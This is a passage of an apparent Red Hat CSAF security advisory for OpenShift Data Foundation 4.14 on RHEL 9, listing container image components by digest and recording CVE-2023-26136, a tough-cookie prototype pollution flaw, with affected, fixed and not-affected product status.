"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", }, product_reference: "odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", }, product_reference: "odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", }, product_reference: "odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", }, product_reference: "odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64 as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", relates_to_product_reference: "9Base-RHODF-4.14", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x as a component of RHODF 4.14 for RHEL 9", product_id: "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", relates_to_product_reference: "9Base-RHODF-4.14", }, ], }, vulnerabilities: [ { acknowledgments: [ { names: [ "Kokorin Vsevolod", ], }, ], cve: "CVE-2023-26136", cwe: { id: "CWE-1321", name: "Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')", }, discovery_date: "2023-07-03T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64", "9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le", "9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64", "9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le", "9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64", "9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le", "9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64", "9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le", "9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2219310", }, ], notes: [ { category: "description", text: "A flaw was found in the tough-cookie package which allows Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.", title: "Vulnerability description", }, { category: "summary", text: "tough-cookie: prototype pollution in cookie memstore", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le", "9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x", ], known_not_affected: [ "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64", "9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le", "9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le", "9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x", "9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64", "9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64", "9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64", "9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le", "9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x", "9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64", "9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64", "9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64", "9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le", "9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64", 